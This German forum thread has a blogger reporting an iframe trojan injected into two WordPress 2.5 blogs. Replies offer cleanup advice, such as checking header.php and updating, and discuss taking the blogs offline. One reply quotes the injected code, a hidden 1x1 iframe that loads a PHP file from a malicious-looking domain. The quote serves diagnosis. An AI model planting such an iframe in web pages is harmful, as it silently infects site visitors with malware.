Es scheint ein Trojaner-Virus umzugehen auf WP-basierten Seiten.
Zwei Blogs von mir sind betroffen vom --trojan-clicker.HTML.IFrame.od--
Besucher meiner Seiten werden aufgerufen irgendetwas zu installieren und werden gleichzeitig infiziert.
Selbst stelle ich fest, dass mein PC langsamer arbeitet und dass beide Blogs in der Darstellung etwas verrutscht sind.
In den verschiedensten Foren und auf Viren-Webseiten habe ich nicht allzuviel gefunden. Ich vermute, dass sich der Trojaner auf dem Server meines Hosters eingenistet hat in irgendwelche WP-Dateien.
Hat jemand eine Ahnung was ich machen soll/kann?
Trojaner in WP
-
-
- Gerade eben
- Anzeige
Hallo!
Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.
- ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
- ✔️ Deutsche Server & DSGVO-konform
- ✔️ Persönlicher Support (kein 0815-Ticket-System)
-
welche wp version?
-
Ich arbeite mit WP 2.5
-
ein link, damit man sich das mal ansehen kann?
-
Zwei Blogs von mir sind betroffen vom --trojan-clicker.HTML.IFrame.od--
Das klingt nach diesem wp-stats.com Iframe... -
Die zwei Blogs sind:
FOTO’S-ONLINE
und
Islands Surflog -
HTML
<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">Du solltest mal in die header.php deines themes gucken, wahrscheinlich ist der code für den iframe dort drin
ansonsten wordpress sichern, updaten und mal den hinweisen von hier WordPress Plugins für mehr Sicherheit - bueltge.de [by:ltge.de] folgen
-
Danke, ich werde mich da mal 'ranmachen'.
-
Ich bin wohl nicht alleine !
Microsoft gibt Hilfestellung gegen Massen-SQL-Injection - heise Security -
Sorry, aber ich finds unverantwortlich das diese Blogs noch Online sind, ist dir klar das du damit 100e Leute Infizierst? Schade das man solche Virenschleudern nicht Not Schla...schalten kann...
-
Du hast grundsätzlich Recht, aber bitte bedenke, dass nicht jeder sofort Gegenmaßnahmen ergreifen kann. Das kann an persönlichen Dingen liegen (Beruf, Privatleben), hinter denen ein Blog einfach zurücksteht. Manchmal gibt es auch Leute, die es technisch nicht machen können und wollen. Nicht jeder, der einen Blog betreibt, ist automatisch ein Experte für PHP/HTML/JavaScript/Ajax und Co.
Zum Thema Trojaner, Virus und Wurm ist übrigens auch zu sagen, dass eine Teilschuld auch beim Anwender liegt. Alter Browser, unsicherer Browser, altes Betriebssystem, fehlende Sicherheitspatches. Wenn das bereits vernachlässigt wird und der Rechner angreifbar ist, dann kannst du dir so ein Ding überall einfangen.
Ich gebe dir recht. Grundsätzlich. Mit Erkennen des Problems sollte man den Blog vorübergehend vom Netz nehmen. Ich würde es so machen. Aber wie schon oben angeführt, kann das nicht jeder.
-
Vielleicht wäre es auch günstiger wenn man die Links zu den Blogs mit einem entsprechenden Hinweis entfernt @admins
-
Ich bin seit zwei Tagen unentwegt dabei alle Dateien zu säubern, anders geht's nicht.
Ich werde sicherlich hier Entwarnung geben wenn es soweit ist. -
Ich bin seit zwei Tagen unentwegt dabei alle Dateien zu säubern, anders geht's nicht.
Ich werde sicherlich hier Entwarnung geben wenn es soweit ist.
wäre es dann nicht sinnvoller die Blogs erstmal offline zu nehmen :???: -
Das werde ich machen !
-
Beide Blogs sind wieder online.
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!